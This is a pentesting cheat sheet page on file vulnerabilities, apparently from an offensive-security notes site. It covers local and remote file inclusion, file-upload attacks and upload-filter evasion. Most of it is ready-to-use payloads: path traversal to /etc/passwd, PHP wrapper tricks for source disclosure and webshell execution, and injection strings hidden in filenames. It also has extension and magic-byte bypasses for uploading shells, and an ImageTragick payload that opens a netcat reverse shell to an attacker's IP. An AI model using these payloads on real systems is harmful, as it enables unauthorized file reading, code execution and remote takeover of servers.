File Vulnerabilities

LFI

local file inclusion happens when it is possible to access files stored on the target's system by passing a relative path to a parameter of a request. The number of "up one level instructions" is irrelevant because once we reach the root level, the additional "go up" instructions will be ignored.

See LFI List for a list of possible target files for tests

Payloads

#Linux
../../../../../../../../../../../../etc/passwd
#Windows
..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini
..\..\..\..\..\..\..\..\..\..\..\..\boot.ini

Importing with file modifiers

Disclose PHP file source code

<url>?<arg>=php://filter/convert.base64-encode/resource=<php file>.php

Execute webshell from a ZIP file. The webshell extension ca be omitted

<url>?<arg>=zip://<path to zip file>%23<webshell>?<args>

RFI

Remote file inclusion happens when an attacker is able to make a web server include and execute files hosted on a different server controlled by the attacker. For instance by making a parameter point to an url of a file such as a reverse shell written in php it is possible to make the server follow the url and execute the shell

See PHP shells for shells to be used in an attack. Keep in mind that these files MUST be stored as .txt files instead of their executable format (.php, .jsp, .asp). If you don't do this the malicious code will be executed on your local server instead of the remote one

Payloads

www.google.com    #expect to see html code as result
<your url>:<port> #start a listener on the port and see if you receive an HTTP request

File upload functionality

Filename payloads

../../../tmp/evil.png                 #test for LFI
sleep(10)-- -.jpg                     #test for SQLi
<svg onload=alert(document.domain)>   #test for stored XSS
; sleep 10;                           #test for RCE

Evade file restrictions

Changing the content type header when trying to upload reverse shells can bypass simple files detection systems.

These strings are effective in evading file upload checks only if the server does not check the actual file signature but checks only the extension.

file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Magic bytes

To bypass file controls based on MIME type and file signature insert the following bytes sequences at the beginning of the file to change its type and edit file extension accordingly. Once the file is stored on the server you will have to find a way to edit it back in order to restore its origina behavior when opened

python -c "print '<signature>'" > <file>
#hex signature example: \x4D\x5A
File type
Mnemonic
Signature

DOS executable

"MZ"

0x4D 0x5A

PE32 executable

"MZ"...."PE.."

0x4D 0x5A ... 0x50 0x45 0x00 0x00

Mach-O Executable (32 bit)

"FEEDFACE"

0xFE 0xED 0xFA 0xCE

Mach-O Executable (64 bit)

"FEEDFACF"

0xFE 0xED 0xFA 0xCF

ELF Executable

".ELF"

0x7F 0x45 0x4C 0x46

Zip Archive

"PK.."

0x50 0x4B 0x03 0x04

Rar Archive

"Rar!...."

0x52 0x61 0x72 0x21 0x1A 0x07 0x01 0x00

Ogg Container

"OggS"

0x4F 0x67 0x67 0x53

Matroska/EBML Container

N/A

0x45 0x1A 0xA3 0xDF

PNG Image

".PNG...."

0x89 0x50 0x4E 0x47 0x0D 0x0A 0x1A 0x0A

BMP Image

"BM"

0x42 0x4D

GIF Image

"GIF87a"

0x47 0x49 0x46 0x38 0x37 0x61

GIF Image

"GIF89a"

0x47 0x49 0x46 0x38 0x39 0x61

ImageTrick vulnerability

Save this code snippet in a text file and upload it to receive a reverse shell

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|nc -e /bin/sh <IP> "<PORT>)'
pop graphic-context
PreviousFuzzying and encodingNextLFI List

Last updated